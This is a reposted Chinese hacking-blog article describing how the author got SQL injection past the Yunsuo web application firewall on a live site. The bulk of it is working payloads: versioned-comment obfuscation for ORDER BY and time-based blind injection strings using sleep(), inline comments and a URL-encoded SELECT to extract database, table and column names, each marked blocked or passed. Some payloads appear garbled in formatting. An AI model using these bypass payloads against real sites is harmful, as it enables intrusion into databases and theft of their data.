记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

实战bypass云锁

2020-04-09 11:26

bypass云锁

我在先知搜了下,发现居然没有bypass云锁的文章,虽然网上有很多bypass云锁文章但是我看了下好像对这篇文章云锁站都gg了,或者云锁已经加强了规则,这里索性就记录下我最近一个bypass云锁.

绕过order by

这里and 没有被拦截就不测试,直接order by肯定不出意外被拦截

/!order//!by/1 拦截
/!40000/!30000order//!40000/!30000by/1 不拦截 这里30000是数据库版本如果大于他就会执行.

无法绕过union select

这里我花了很多时间来绕union select 发现一直绕不过,如果那位师傅有绕过方法,私聊下....手动打“哭”

转换思路从时间盲注开始

查询数据库

id=2 and length(database())>1 不拦截,这里我们可以判断出数据库长度.

获取数据库名

id= 2 and if(ascii(substr(database(),1,1))>120,1,sleep(7))  拦截
id=2 and if(ascii(substr(database/**/(),1,1))>120,1,sleep/**/(7)) 不拦截
id=2 and if(ascii(substr(database/*!()*/,1,1))>120,1,sleep/*!(7)*/) 不拦截


使用上面paylaod就能够测出数据库名

查询数据库表

id=2 and if (ascii(substr(select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>96,1,sleep(5))  拦截
id=2 and if (ascii(substr(select table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5)) 拦截
id=2 and if (ascii(substr(select table_name from information_schema.tables where table_schema=database/*!()*/ limit 0,1),1,1))>96,1,sleep/*!(5)*/) 拦截

这里我就试着把一句句去掉看是哪里被拦截最终发现,是select被拦截,去掉select不拦截,提示语法错误
id=2 and if(ascii(substr(( table_name from information_schema.tables where table_schema=database//() limit 0,1),1,1))>96,1,sleep//(5)) 不拦截

这里来绕select
id=2 and if(ascii(substr(( /!Select/+table_name from information_schema.tables where table_schema=database//() limit 0,1),1,1))>96,1,sleep//(5)) 拦截
id=2 and if(ascii(substr((/!40000/!30000select/ table_name from information_schema.tables where table_schema=database//() limit 0,1),1,1))>96,1,sleep//(5)) 拦截
id=2 and if(ascii(substr((/
!50000select/table_name from information_schema.tables where table_schema=database//() limit 0,1),1,1))>96,1,sleep//(5)) 拦截
id=2 and if(ascii(substr((/
!50000%53elect*/table_name from information_schema.tables where table_schema=database//() limit 0,1),1,1))>96,1,sleep//(5)) 不拦截
这里就可以直接查询出数据库表名

查询字段

直接使上面最后一条就可以绕过
id=2 and if(ascii(substr((/!50000%53elect/column_name from information_schema.columns where table_schema=database//() and table_name='xxxx' limit 0,1),1,1))>96,1,sleep//(5)) 不拦截


知识来源: xz.aliyun.com/t/7522

阅读:43941 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“实战bypass云锁”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云